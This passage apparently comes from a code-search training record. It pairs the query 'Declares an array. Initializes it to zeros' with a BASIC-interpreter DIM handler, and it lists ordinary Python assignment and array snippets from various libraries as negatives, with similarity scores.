cfg_set[\"source_dict\"][var]==\"METADATA\":\r\n return\r\n \r\n t1 = datetime.datetime.now()\r\n if cfg_set[\"verbose\"]: print(\" ... new \"+var+\" array created in:\")\r\n filename = path_creator_vararr(\"orig\",var,cfg_set)\r\n vararr = np.zeros((cfg_set[\"n_integ\"],)+cfg_set[\"xy_ext\"])\r\n \r\n ## Get field of every time step (if map-function cannot be applied)\r\n i = 0\r\n t_delta = np.array(range(cfg_set[\"n_integ\"]))*datetime.timedelta(minutes=cfg_set[\"timestep\"])\r\n if var == \"TRT\":\r\n vararr = get_vararr_TRT_t0(cfg_set[\"t0\"], cfg_set)\r\n else:\r\n for t_d in t_delta:\r\n t_current = cfg_set[\"t0\"] - cfg_set[\"time_change_factor\"]*t_d\r\n vararr_t = get_vararr_t(t_current, var, cfg_set)\r\n vararr[i,:,:] = vararr_t[0,:,:]\r\n i += 1\r\n save_file(filename, data_arr=vararr,var_name=var,cfg_set=cfg_set)\r\n if cfg_set[\"verbose\"]: print(\" \"+filename)\r\n \r\n ## In case verification of displacements should be performed, also initialise skill-score array:\r\n if cfg_set[\"verify_disp\"]:\r\n filename_verif = \"%stmp/%s_%s_%s_verif.npy\" % (cfg_set[\"root_path\"],\r\n cfg_set[\"verif_param\"],str(cfg_set[cfg_set[\"verif_param\"]]), var)\r\n verif_array = np.zeros((1,len(cfg_set[\"scores_list\"]),cfg_set[\"n_integ\"]-1))-9999.\r\n np.save(filename_verif, verif_array)\r\n \r\n t2 = datetime.datetime.now()\r\n if False: print(\" Elapsed time for creation of variable %s: %s\" % (var,str(t2-t1)))", "def test_array_destructuring():\n assert not _do_test_raw(\"\"\"\n [a, b, c, d] = [1, 2, 3, 4];\n [] = bar();\n \"\"\").failed()\n\n assert not _do_test_raw(\"\"\"\n function foo(x, y, [a, b, c], z) {\n bar();\n }\n \"\"\").failed()", "def setValue(self,variable,value):\n for adjective_key in value:\n variable.adjectives[adjective_key].membership = value[adjective_key]\n return None", "def push(self, name, var, timeout=None, verbose=True):\r\n if isinstance(name, str):\r\n name = [name]\r\n var = [var]\r\n\r\n for n, v in zip(name, var):\r\n self.feval(\"assignin\", \"base\", n, v, nout=0, timeout=timeout, verbose=verbose)", "def set_variables(self, new_variables: np.array):\n pass", "def assign(self, dst, req, src):\n if req == 'null':\n return\n if req in ('write', 'inplace'):\n dst[:] = src\n elif req == 'add':\n dst[:] += src", "def assign(self, var, value):\n\t\tself._root = self._insert(self._root, var, value)", "def convert_assign(g, op, block):\n\n out = g.get_node(op.input(\"X\")[0])\n g.add_node(op.output(\"Out\")[0], out)", "def assign_to_env(self, line):\n tag = line[0]\n value = line[2::]\n self.env[tag] = self.eval_sub_statement(value)", "def setitem(ary, loc, value):\n\n if not isinstance(loc, tuple):\n loc = (loc,)\n\n # Let's try to convert non-arrays and non-scalars to an array\n # e.g. converting a python list to an array\n if not (bhary.check(value) or np.isscalar(value)):\n value = array_create.array(value)\n\n # Lets make sure that not all dimensions are indexed by integers\n loc = list(loc)\n if len(loc) == ary.ndim and all((np.isscalar(s) for s in loc)):\n # 'slice' doesn't support negative start index\n if loc[0] < 0:\n loc[0] += ary.shape[0]\n loc[0] = slice(loc[0], loc[0] + 1)\n\n # Copy the 'value' to 'ary' using the 'loc'\n if ary.ndim == 0:\n assign(value, ary)\n else:\n assign(value, ary[tuple(loc)])", "def set_value(self, var_name, new_value, tf_session):\n\n if(var_name in self.assign_operator):\n\n tf_session.run(\n self.assign_operator[var_name], {\n self.l_param_input[var_name]: new_value})\n else:\n print(\"Thou shall only assign learning parameters!\")", "def convert_assign_value(g, op, block):\n\n keys = [\"bool_values\", \"fp32_values\", \"int32_values\", \"int64_values\"]\n dtypes = [\"bool\", \"float32\", \"int32\", \"int64\"]\n for i, key in enumerate(keys):\n dtype = dtypes[i]\n value = np.array(op.attr(key)).astype(dtype)\n if value is not None and value.size >= 1:\n break\n shape = op.attr(\"shape\")\n value = value.reshape(shape)\n out = _op.const(value, dtype=dtype)\n g.add_node(op.output(\"Out\")[0], out)", "def assign_from_values_fn(var_names_to_values):\n assign_op, feed_dict = assign_from_values(var_names_to_values)\n def callback(session):\n return session.run(assign_op, feed_dict)\n return callback", "def test_setitem(self, env: yaenv.Env):\n assert 'NEW_VAR' not in env\n env['NEW_VAR'] = 'new_var'\n assert env['NEW_VAR'] == 'new_var'\n env['NEW_VAR'] = 'newer var'\n assert env['NEW_VAR'] == 'newer var'", "def do_assign(parser, token):\n bits = token.contents.split()\n if len(bits) != 3:\n raise template.TemplateSyntaxError(\"'%s' tag takes two arguments\" % bits[0])\n value = parser.compile_filter(bits[2])\n return AssignNode(bits[1], value)", "def do_assign(parser, token):\n bits = token.contents.split()\n if len(bits) != 3:\n raise template.TemplateSyntaxError(\"'%s' tag takes two arguments\" % bits[0])\n value = parser.compile_filter(bits[2])\n return AssignNode(bits[1], value)", "def __setitem__(self, key: str, value: Any) -> None:\n self.variables[key] = value", "def _setitem_for_tensor_array(var, item, value):\n\n from .framework import Variable\n\n assert (\n not paddle.in_dynamic_mode()\n ), \"setitem for tensor_array must be called in static graph mode.\"\n if isinstance(item, (Variable, int)):\n from paddle.jit.dy2static.variable_trans_func import (\n to_static_variable,\n )\n from paddle import cast\n from paddle.tensor import array_write\n\n item = paddle.cast(to_static_variable(item), dtype='int64')\n value = to_static_variable(value)\n return array_write(x=value, i=item, array=var)\n else:\n raise NotImplementedError(\n \"Only support __setitem__ by Int/Variable in tensor_array, but gets {}\".format(\n type(item)\n )\n )", "def assign(self, other):\n\n assert isinstance(other, VarList)\n assert len(self) == len(other)\n ops = []\n for (my_var, other_var) in zip(self.vars_, other.vars_):\n ops.append(my_var.assign(other_var))\n return tf.group(*ops, name=\"assign_\"+self.name)", "def tset(self, parametername, value_array):\n raise NotImplementedError", "def visit_Assign(self, node):\n self.generic_visit(node)\n target = get_single_target(node)\n if isinstance(target, ast.Attribute):\n args = [ target.value, ast.Str(target.attr), node.value ]\n return ast.Expr(to_call(to_name('setattr'), args))\n return node", "def test_list_assign(self):\r\n def local_test(x,y):\r\n m1=Module()\r\n\r\n #create a list with some variables in it\r\n m1.l=[x(), y()]\r\n\r\n # create a Method that makes the second list element a shared Member\r\n m1.f=Method([], m1.l[1])\r\n m1.g=Method([], m1.l[0])\r\n m = m1.make()\r\n\r\n #assign 4 and 5 to the two variables' containers in m\r\n m.l = [4, 5]\r\n m.f()\r\n assert numpy.all(5 == m.f())\r\n assert numpy.all(4 == m.g())\r\n\r\n local_test(lambda:T.dscalar(),lambda:T.dscalar())", "def visit_Assign(self, node: Assign) -> None:\n\n node_type = type(node.right).__name__\n if isinstance(node.right, String):\n self._create_instruct(node_type)\n self.visit(node.left)\n instruct = self.visit(node.right)\n c_str = self.builder.alloca(instruct.type)\n self.builder.store(instruct, c_str)\n self.builder.ret_void()\n else:\n self._create_instruct(node_type)\n self.visit(node.left)\n instruct = self.visit(node.right)\n self.builder.ret(instruct)\n\n self.GLOBAL_MEMORY[node.left.value] = instruct", "def let(self, var, val):\n\n self.d['__vstemp'] = val\n if var.endswith('+'):\n rvar = var.rstrip('+')\n # .. obj = eval(rvar,self.d)\n exec(\"%s.append(__vstemp)\" % rvar, self.d)\n else:\n exec(var + \" = __vstemp\", self.d)\n del self.d['__vstemp']", "def variability(sv):\r\n unchanging(sv) # remove change clause for constants \r\n make_volatiles(sv) # create list of volatile objects and make their clause Always\r", "def __setitem__(self, name, variable):\n vec = h.Vector()\n self._vectors[name] = vec\n vec.record(variable)", "def set_variable_value(var, val, env):\n def env_loop(environment):\n \"\"\"\n calls scan on each frame in the env list\n \"\"\"\n def scan(vars, vals):\n \"\"\"\n scans variables in a frame\n \"\"\"\n if isNull(vars):\n return env_loop(enclosing_env(environment)) # 5-4: env -> environment\n elif var == car(vars):\n return set_car(vals, val) #4-15\n else:\n return scan(cdr(vars), cdr(vals)) # 4-15\n if environment is the_empty_environment:\n raise UnboundLocalError(\"lookup_variable\")\n frame = first_frame(environment)\n return scan(frame_variables(frame), frame_values(frame)) # 4-15\n return env_loop(env) # 4-15", "def test_test_arraypointertype(self):\n input = \"\"\"\n void main () {\n float arr[3];\n arr[2]=1.5;\n foo(arr);\n arr[2] = foo(arr)[2] + 1.1;\n putFloatLn(arr[2]);\n }\n float[] foo(float x[]){\n x[2] = 5.1;\n return x;\n }\n \"\"\"\n expect = \"6.2\\n\"\n self.assertTrue(TestCodeGen.test(input,expect,571))", "def verify_assign(self, d_stmt, table):\n lvalue = DanaExpr.factory(d_stmt.find_first_child(\"p_lvalue\"), table)\n expr = DanaExpr.factory(d_stmt.find_first_child(\"p_expr\"), table)\n self.exprs = [lvalue, expr]\n\n expr.type.check_type(d_stmt.linespan, lvalue.type)\n expr.type.in_types(d_stmt.linespan, [DanaType(\"int\"), DanaType(\"byte\")])", "def _set_array(self, name, value, index=None):\n util.set_array_if_not_same(self._arrays[name], value, index)", "def assign_from_values(var_names_to_values):\n feed_dict = {}\n assign_ops = []\n\n for var_name in var_names_to_values:\n var_value = var_names_to_values[var_name]\n var = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES, var_name)\n if not var:\n raise ValueError('Variable %s wasn\\'t found' % var_name)\n elif len(var) > 1:\n # tf.get_collection is just a filter on the prefix: find the exact match:\n found = False\n for v in var:\n if v.op.name == var_name:\n var = v\n found = True\n break\n\n if not found:\n raise ValueError('Variable %s doesn\\'t uniquely identify a variable' %\n var_name)\n else:\n var = var[0]\n\n # TODO(nsilberman): ensure placeholder and assign are on the same device.\n # Assign a placeholder to the value that will be filled later.\n placeholder_name = 'placeholder/' + var.op.name\n placeholder_value = array_ops.placeholder(\n dtype=var.dtype.base_dtype,\n shape=var.get_shape(),\n name=placeholder_name)\n assign_ops.append(var.assign(placeholder_value))\n\n feed_dict[placeholder_value] = var_value.reshape(var.get_shape())\n\n assign_op = control_flow_ops.group(*assign_ops)\n return assign_op, feed_dict", "def assigninput(self, input):\n if type(input) == str: # string type\n self.name = input\n else: # array, list, tuple\n if len(input) == 2:\n print input[0], 'input0'\n try:\n n = len(input[0])\n except:\n n = 1\n if n == 1:\n\t\t print 'INITIALIZING SPARSE ARRAY TO ZEROS'\n self.ny, self.nx = input\n input = zeros(input, int)\n ## BELOW NOT QUITE RIGHT...\n ## ACTUALLY IT JUST TAKES LONG TO BUILD THE HUGE ARRAY\n # TAKES TIME TO UNRAVEL\n # LET'S JUST MAKE IT RIGHT THE FIRST TIME:\n #input = zeros(input[0] * input[1], 'int')\n #self.data = input\n self.data = ravel(array(input)) # ravel ADDED MUCH LATER" ]
[ "0.6699032", "0.6667143", "0.66010433", "0.64327574", "0.6394654", "0.632295", "0.62098926", "0.61762494", "0.6125874", "0.6119721", "0.60467184", "0.6016822", "0.5979976", "0.5958759", "0.58768624", "0.57980937", "0.5793912", "0.5786944", "0.57581115", "0.5734274", "0.573222", "0.57276773", "0.57172596", "0.5700201", "0.56997126", "0.56997126", "0.56997126", "0.56997126", "0.5676348", "0.56761956", "0.5668733", "0.5668506", "0.5663936", "0.56568664", "0.5607729", "0.5596645", "0.5587593", "0.5581672", "0.55734444", "0.5566223", "0.55657524", "0.5554801", "0.5508019", "0.55037874", "0.54986787", "0.5491426", "0.54799676", "0.54751265", "0.54698944", "0.54549056", "0.5451319", "0.5422456", "0.5392408", "0.5378242", "0.5375109", "0.53619474", "0.5352494", "0.5327749", "0.5319459", "0.53021413", "0.5294553", "0.5294553", "0.5294553", "0.5294553", "0.5294553", "0.5291089", "0.52885437", "0.5287809", "0.5256138", "0.5246083", "0.5228743", "0.52205926", "0.5213194", "0.5201344", "0.5199537", "0.51837945", "0.51811075", "0.5179904", "0.5174761", "0.5162669", "0.51569515", "0.5155051", "0.51455337", "0.51455337", "0.51370096", "0.51175475", "0.511436", "0.51060694", "0.5095767", "0.508991", "0.5076567", "0.5072704", "0.5067847", "0.5066328", "0.50543755", "0.5047216", "0.5042417", "0.5041681", "0.5033837", "0.5028663" ]
0.7048861
0
Declares an array. Initializes it to zeros. TODO Handle more than two dimensions.
def stmt_dim(executor, stmt:ParsedStatementDim): for name, value in stmt._dimensions: initializer = init_array(value) executor.put_symbol(name, initializer, SymbolType.ARRAY, arg=None) # Not right, but for now.
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def zeros_numpy_array(self,\n type_name,\n as_matrix = True):\n if as_matrix:\n return np.zeros((1, self.get_max_id(type_name)), dtype='float32')\n else:\n return np.zeros((self.get_max_id(type_name),), dtype='float32')", "def zero_init(self, shape):\n return np.zeros((shape[0],shape[1]))", "def zeros( cls, dims, typeCode ):\n dims = numpy.array( dims, dtype='i')\n return numpy.zeros( dims, GL_TYPE_TO_ARRAY_MAPPING[typeCode])", "def __array__(self):\n return np.zeros(self.shape, self.dtype)", "def initialize_with_zeros(dim):\n\n ### START CODE HERE ### (≈ 1 line of code)\n w = np.zeros(shape=(dim, 1))\n b = 0\n ### END CODE HERE ###\n\n assert (w.shape == (dim, 1))\n assert (isinstance(b, float) or isinstance(b, int))\n\n return w, b", "def initalize_with_zeros(dim):\n return np.zeros((dim, 1)), 0.0", "def _init_array(self, nClumps, nt=0, dim=0, dtype=float, units=None):\n shape = [nClumps]\n \n if nt > 1:\n \n shape.append(nt)\n \n if dim > 1:\n \n shape.append(dim)\n \n if np.issubdtype(dtype, float):\n \n fill_val = np.nan\n \n elif np.issubdtype(dtype, int):\n \n fill_val = -1\n \n else:\n \n fill_val = 0\n \n outarray = SimArray(fill_val*np.ones(shape, dtype=dtype), units)\n \n return outarray", "def init_array(self, data_shape, chunk_size, dtype, chan_names, clims, overwrite=False):\n self.dtype = np.dtype(dtype)\n\n self.set_channel_attributes(chan_names, clims)\n self.current_pos_group.zeros(\n ARRAY_NAME,\n shape=data_shape,\n chunks=chunk_size,\n dtype=dtype,\n compressor=self.__compressor,\n overwrite=overwrite,\n )", "def clear(self):\n self.array = np.zeros(shape=(0, 2))", "def __init__(self):\n self.X = np.zeros((0, 2))", "def __call__(self, shape):\n return np.zeros(shape)", "def zero(self):\n return np.zeros([self.nx])", "def __init__(self):\n self._size = 0 # count actual elements\n self._capacity = 1 # default array capacity\n self._Array = self._make_array(self._capacity) # low-level array", "def zeros(dim):\n\n return np.zeros(dim, dtype='uint8')", "def zeros(shape, dtype=None):\n raise NotImplementedError", "def zeros(cls,size:(int,int)) -> 'Matrix': #note single quotes because this is the class, itself and has not been completely defined yet.\n N = size[0]\n M = size[1]\n\n assert N>0 and M>0, \"N and M must be positive.\"\n return cls([[0 for col in range(M)] for row in range(N)])", "def init_one_d_array(len, val):\n return [val for i in range(len)]", "def _build(self):\n ary = np.zeros( (3,3,3), float )\n ary[0,0,0] = ary[1,1,1] = ary[0,1,2] = ary[1,0,2] = 1.\n ary[0,2,0] = ary[0,2,2] = ary[2,0,0] = ary[2,0,2] = 0.5\n ary[1,2,1] = ary[1,2,2] = ary[2,1,1] = ary[2,1,2] = 0.5\n ary[2,2,0] = ary[2,2,1] = 0.25\n ary[2,2,2] = 0.5\n return ary", "def value_zeros(self, shape):\r\n return numpy.zeros(shape, dtype=self.dtype)", "def initialize_with_zeros(dim):\n \n w = np.zeros([dim, 1])\n b = 0;\n\n assert(w.shape == (dim, 1))\n assert(isinstance(b, float) or isinstance(b, int));\n \n return w,b;", "def zeros(shape, dtype=None, order='C'):\n a = ndarray.__new__(matrix, shape, dtype, order=order)\n a.fill(0)\n return a", "def __init__(self):\n self.array = [None] * 1543", "def init_data(self):\n return np.zeros(self.shape, dtype=bool)", "def __init__(self):\n self.array = None\n pass", "def init_zero_matrix(self,rows,cols):\n\t\ttmpMatrix = []\n\t\tfor i in range(rows):\n\t\t\ttmp = [0 for j in range(cols)]\n\t\t\ttmpMatrix.append(tmp)\n\t\treturn tmpMatrix", "def __init__(self, initial_arr=[]):\n self.arr = initial_arr\n self.size = len(self.arr)", "def __init__(self, rows, cols, default_val=0):\n self.num_rows = rows\n self.num_cols = cols\n\n # Initialize the 2-dimensional array\n self.rows = [[default_val] * cols for _ in xrange(rows)]", "def initialize_with_zeros(dim):\n w = np.zeros((dim,1))\n b = 0\n\n assert(w.shape==(dim,1))\n assert(isinstance(b,float) or isinstance(b,int))\n return w, b", "def shared_mem_zero_initializer(shape, dtype, name): # pylint: disable=unused-argument\n data = empty_shared_mem(name, True, shape, dtype)\n dlpack = data.to_dlpack()\n arr = F.zerocopy_from_dlpack(dlpack)\n arr[:] = 0\n return arr", "def initialize_with_zeros(dim):\n\n w = np.zeros((dim, 1))\n b = 0\n\n return w, b", "def zeros(shape, dtype=None):\r\n if not isinstance(shape, (list, tuple, TensorVariable)):\r\n shape = [shape]\r\n if dtype is None:\r\n dtype = config.floatX\r\n return alloc(numpy.array(0, dtype=dtype), *shape)", "def __init__(self, maxSize=3):\r\n try:\r\n if maxSize % 2 == 1 and maxSize >= 3:\r\n self._maxSize = maxSize\r\n else:\r\n raise ValueError(\"maxSize must be an odd integer >= 3\")\r\n except ValueError:\r\n raise\r\n self._data = np.ndarray(0)", "def _setup_ndarrays(self) -> None:\n empty = self.ele_orig * 0\n # 2D arrays\n self.ele = np.copy(self.ele_orig) # Elevation including glaciers\n self.slp = np.copy(empty) # Slope with glacier geometry\n self.asp = np.copy(empty) # Classified aspect with glacier geometry\n self.h = np.copy(empty) # Local glacier height\n self.u = np.copy(empty) # Local glacier velocity\n self.hs = hillshade(\n self.ele_orig,\n self.PLOT_HILLSHADE_AZIMUTH,\n self.PLOT_HILLSHADE_ALTITUDE,\n ) # HS\n\n # Initialize array store\n self.store = ArrayStore()\n self.store.create(\"h\", self.MODEL_RECORD_SIZE)\n self.store.create(\"u\", self.MODEL_RECORD_SIZE)", "def __init__(self):\n self.temperature = np.array([])\n self.salinity = np.array([])\n self.date = np.array([])\n self.temperatureQF = np.array([])\n self.salinityQF = np.array([])", "def set_zero_vector(self):\n self.vector = np.zeros(self.dimension, dtype = float)", "def __init__(self):\n self.arr = []\n for i in range(80):\n self.arr.append([])", "def init_zero(cls, h):\n shapes = Checkpoint.make_shaped_arrays(h)\n return jax.tree_util.tree_map(lambda s: np.zeros(s.shape, s.dtype), shapes)", "def initArrayWithNumbers(self, array):\n for i in range(array.shape[0]):\n array[i][0] = 1\n for j in range(array.shape[1]):\n array[0][j] = 1\n return array", "def __init__(self):\n self.arr = array(\"i\")", "def zeros(shape, dtype=None):\n\n return full(shape, 0, dtype)", "def init_zero(cls, h):\n shapes = QuantizedCheckpoint.make_shaped_arrays(h)\n return jax.tree_util.tree_map(lambda s: np.zeros(s.shape, s.dtype), shapes)", "def __init__(self):\n self._array = None", "def __init__(self):\n self.array = [None for i in range(10000)]", "def initialize(self):\n x0 = [None]*3\n for i in self.free:\n if i=='lengthscale':x0[0]=self.free[i]\n if i=='variance':x0[1]=self.free[i]\n if i=='gstds':x0[2]=self.free[i]\n x0 = [x for x in x0 if x is not None]\n return np.array(x0)", "def empty(shape, dtype=None, order='C'):\n return ndarray.__new__(matrix, shape, dtype, order=order)", "def construct_array_type(cls, *args):\n if len(args) > 0:\n raise NotImplementedError(\"construct_array_type does not support arguments\")\n return FletcherArray", "def __init__(self):\n\n\t\tself.position = np.array([0, 0])", "def zeros(cls, shape, domain):\n func = cls._get_flint_func(domain)\n return cls._new(func(*shape), shape, domain)", "def zeros(shape, ctx=None, dtype=None, stype=None, **kwargs):\n\n if stype is None or stype == 'default':\n return _zeros_ndarray(shape, ctx, dtype, **kwargs)\n else:\n return _zeros_sparse_ndarray(stype, shape, ctx, dtype, **kwargs)", "def __init__(self, left_dim, right_dim, num_type='double'):\n super(Wavefunction, self).__init__()\n try:\n self.as_matrix = np.empty((left_dim, right_dim), num_type)\n except TypeError:\n print(\"Bad args for wavefunction\")\n raise\n\n self.left_dim = left_dim\n self.right_dim = right_dim\n self.num_type = num_type", "def zeros_like(self):\n return TightBinding.zeros(self.dims, self.shape)", "def zeros(self):\n super(TimeCube, self).zeros()\n self.data = np.zeros([self.time_range[1]-self.time_range[0]]+self.cubesize, np.uint8)", "def matrix_init(sizex, sizey):\n return [[0]*sizey for i in range(sizex)]", "def zeros(dims,shape):\n return TightBinding({}, dimensions = dims, shape = shape)", "def __init__(self, x, y=None):\n self.len = x\n if y:\n self.size = x * y\n self.data = np.empty((x, y))\n else:\n self.size = self.len\n self.data = np.empty((x,))\n self.idx = 0", "def __init__(self,width=8,height=8):\n\t\tif height > 32 or width < 1 or height < 1:\n\t\t\traise \"Height must be between 1 and 32, width must be greater than 0\"\n\n\t\tself.Width = width\n\t\tself.Height = height\n\t\tself.Grid = [0] * width # we'll use 8 bits of the number in the array", "def zero_vector(cls):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! \"\"\"\r\n cls.wzero = np.zeros((Turbine.N, ), dtype=float)", "def initialize(self, dim):\n\n self.w = np.zeros((dim, 1))\n self.b = 0\n\n assert(self.w.shape == (dim, 1))\n assert(isinstance(self.b, float) or isinstance(self.b, int))", "def zeros_like(self):\n return MultiterminalDevice.zeros(\n self.dims,\n self.center.shape,\n tuple(i.shape for i in self.leads),\n self.connections,\n )", "def test_zero_size_array_constructor():\n fcode = \"integer ::\"\n ast = Fortran2003.Ac_Spec(fcode)\n assert isinstance(ast, Fortran2003.Ac_Spec)\n assert isinstance(ast.children[0], Fortran2003.Intrinsic_Type_Spec)", "def __init__(self):\n super(INumpyArrayMetric, self).__init__()\n self.metric = 'INumpyArrayMetric'\n self.ground_truth = None # np.ndarray\n self.segmentation = None # np.ndarray", "def __init__(self, w):\n self.w = np.array(w) if isinstance(w, list) else w\n self.c = np.zeros_like(self.w)", "def test_array(self):\n htype = h5t.py_create(('f',(2,2)))\n self.assertIsInstance(htype, h5t.TypeArrayID)\n self.assertEqual(htype.get_array_dims(), (2,2))", "def zeros_matrix(self, rows, cols):\r\n M = []\r\n while len(M) < rows:\r\n M.append([])\r\n while len(M[-1]) < cols:\r\n M[-1].append(0.0)\r\n\r\n return M", "def initialiseArrays(self):\n self.z_array = np.arange(self.z_start, self.z_end, self.dz)\n # self.gamma_tilde_dash = [self.E(z) / -epsilon_e for z in self.z_array]\n self.gamma_tilde_dash = np.array([norm_E(self.z_array) * self.rf_peak_field * 1e6 / -epsilon_e for norm_E in self.norm_E])\n self.theta_L_array = np.zeros_like(self.z_array)\n self.gamma_dash_array = np.zeros_like(self.z_array)\n self.u_array = np.zeros((len(self.z_array), 4))\n self.M_array = np.zeros((len(self.z_array), 4, 4))\n self.calc_level = INIT_ARRAYS", "def __init__(self, n):\r\n self.size = n\r\n self.mat = []\r\n for i in range(n):\r\n self.mat.append([0] * n)", "def zero_indexed(array):\n if all(dl == 0 for dl in array.datashape.dim_low):\n return array\n if any(dl < 0 for dl in array.datashape.dim_low):\n raise ValueError(\"Cannot zero_index array: one or more \"\n \"dimensions start < 0\")\n\n ds = array.datashape.copy()\n ds.dim_low = [0] * ds.ndim\n return array.redimension(ds.schema)", "def setup(self, length):\n self.matrix = [None] * length\n for x in range(0,length):\n self.matrix[x] = [None] * length\n self.i = self.k = self.j = 0", "def _alloc(self, dim):\n maxp = self.maxp\n self.dim = dim\n self.x = np.zeros((maxp, dim))\n self.fx = np.zeros((maxp, 1))\n self.surrogate_list = [\n [None for _ in range(maxp)] for _ in range(self.M)]", "def zeros(cls, shape, domain, *, fmt='sparse'):\n return cls.from_rep(SDM.zeros(shape, domain))", "def __init__(self, shape, dtype = 'd'):\n self.shape = shape\n self.dtype = dtype\n \n ncell = int(np.prod(self.shape))\n self.shared_array_base = Array(dtype, ncell,lock=False) \n pass", "def __init__(self, rows, cols):\n if rows <= 0:\n raise ValueError('Number of matrix rows must be greater than zero.')\n if cols <= 0:\n raise ValueError('Number of matrix cols must be greater than zero.')\n\n self.__rows = rows\n self.__cols = cols\n\n # Create the matrix and initialize all elements to zero\n self.__m = []\n for i in range(1, self.__rows + 1):\n row = []\n for j in range(1, self.__cols + 1):\n row.append(0)\n self.__m.append(row)", "def _init_empty(self):\n self._data = []", "def matZeros(shape):\n return [[0 for y in range(shape[1])] \\\n for x in range(shape[0])]", "def __init__(self, growth_factor=2):\n self._length = 0 # Number of elements in array\n self._capacity = 1 # Capacity of array before expanding\n self._arr = self._create_array(self._capacity) # Compact array of pointers\n self._growth_factor = max(2, growth_factor) # Factor to grow array when capacity reached", "def Array(cls, size=None):\n array_class = NandArray\n if size:\n return array_class(size)\n return array_class", "def __init__(self):\n self.arr = []\n self.size = 0", "def zeroes(height, width):\n g = [[0.0 for _ in range(width)] for __ in range(height)]\n return Matrix(g)", "def __init__(self, x_size: int, y_size: int, dtype=np.int8):\r\n self.fb = np.zeros(shape=(x_size, y_size), dtype=dtype)\r\n self.x_size = x_size\r\n self.y_size = y_size\r\n self.dtype = dtype", "def zeros(dims,shape_c,shape_l,connections):\n return MultiterminalDevice(\n TightBinding.zeros(dims,shape_c),\n tuple(TightBinding.zeros(dims+1,i) for i in shape_l),\n connections,\n )", "def __init__(self, arr=None):\n self.data = arr.copy() if arr else []", "def __init__(self, shape):\n self.A = np.zeros(shape) # create space for the resultant activations", "def zerovec(self, X):\n return np.zeros(X.size())", "def zeros(\n shape,\n *,\n dtype=None,\n order=\"C\",\n device=None,\n usm_type=\"device\",\n sycl_queue=None,\n):\n dpu.validate_usm_type(usm_type, allow_none=False)\n sycl_queue_normalized = dpnp.get_normalized_queue_device(\n sycl_queue=sycl_queue, device=device\n )\n if order is None:\n order = \"C\"\n\n \"\"\"Creates `dpnp_array` of zeros with the given shape, dtype, and order.\"\"\"\n array_obj = dpt.zeros(\n shape,\n dtype=dtype,\n order=order,\n usm_type=usm_type,\n sycl_queue=sycl_queue_normalized,\n )\n return dpnp_array(array_obj.shape, buffer=array_obj, order=order)", "def _create_array(self, array_name, ndim=1, dtype=None, zeros=True, derived=False, shared=None):\n\n # Does this actually correspond to a slice into a 3D array?\n NDname = self._array_name_1D_to_ND(array_name)\n if NDname:\n self._create_array(\n NDname, ndim=3, dtype=dtype, zeros=zeros, derived=derived)\n return\n\n if ndim == 1:\n dims = self._num_particles\n else:\n dims = (self._num_particles, ndim)\n\n if shared is None:\n shared = self._shared_arrays\n\n new_array = array._array_factory(dims, dtype, zeros, shared)\n new_array._sim = weakref.ref(self)\n new_array._name = array_name\n new_array.family = None\n # new_array.set_default_units(quiet=True)\n self._arrays[array_name] = new_array\n\n if derived:\n if array_name not in self._derived_array_names:\n self._derived_array_names.append(array_name)\n\n if ndim == 3:\n array_name_1D = self._array_name_ND_to_1D(array_name)\n\n for i, a in enumerate(array_name_1D):\n self._arrays[a] = new_array[:, i]\n self._arrays[a]._name = a", "def __init__(self, initArray):\n for row in initArray:\n for elem in row:\n if type(elem) is not int:\n raise TypeError\n\n n = len(initArray[0])\n if not all(len(x) == n for x in initArray):\n raise ArithmeticError\n\n self.array = initArray\n return", "def xinit(self, xshape):\n\n return np.zeros(xshape, dtype=self.dtype)", "def _train(self):\n return np.zeros(1, 10)", "def test_30_test_init_array(self, persons_gi):\n example = Example(groups=7, origins=5)\n\n example.init_array('param_g', 7)\n assert example.param_g.shape == (7, )", "def array (self, length, width):\n\t\treturn [[0 for i in range(width)] for j in range(length)] #List comprehensions (Works like two for loops)", "def init_matrix(x_dim = 10, y_dim = 10):\n ret = np.zeros((x_dim, y_dim))\n x_rand = np.random.randint(0, x_dim - 1)\n y_rand = np.random.randint(0, y_dim - 1)\n ret[x_rand, y_rand] = 1\n\n return(ret)", "def zeros_como(self):\n\n return self.zeros(*self.dim())", "def __init__(self, size=1):\n self._data = self._make_array(size)\n self._size = 0\n self._capacity = size", "def init_array(self,\n position,\n data_shape,\n chunk_size,\n chan_names,\n dtype='float32',\n clims=None,\n position_name=None,\n overwrite=False):\n pos_name = position_name if position_name else f'Pos_{position:03d}'\n\n # Make sure data matches OME zarr structure\n if len(data_shape) != 5:\n raise ValueError('Data shape must be (T, C, Z, Y, X), not {}'.format(data_shape))\n\n self.sub_writer.create_position(position, pos_name)\n self.sub_writer.init_array(data_shape, chunk_size, dtype, chan_names, clims, overwrite)", "def __init__(self):\n self.size = 1000\n self.mapArray = [None] * self.size", "def zeros(shape, dtype=float):\n if not mathutil.is_shape(shape, ndim=2):\n raise ValueError(\"invalid shape\")\n\n sc = SparkContext.getOrCreate()\n\n nelem = 0\n\n rdd = sc.emptyRDD()\n\n return Matrix(rdd, shape, dtype=dtype, nelem=nelem)", "def zeros_like(a, dtype=None, order='K', subok=True, shape=None):\n\n res = np.full(a.shape, 0, dtype=a.dtype)\n return res", "def setUp(self):\n self.gray_image = np.ndarray((100, 200), dtype=np.uint8)\n self.rgb_image = np.ndarray((100, 200, 3), dtype=np.uint8)", "def createarray(m,n):\n return( np.ones((m,2,n)) )", "def _init_array(self, b, c):\n self._.c = (Integer(0), ) + tuple(c)\n self._.b = tuple(b) + (Integer(0), )", "def __init__(self, memset_0=False):\r\n self.memset_0 = memset_0" ]
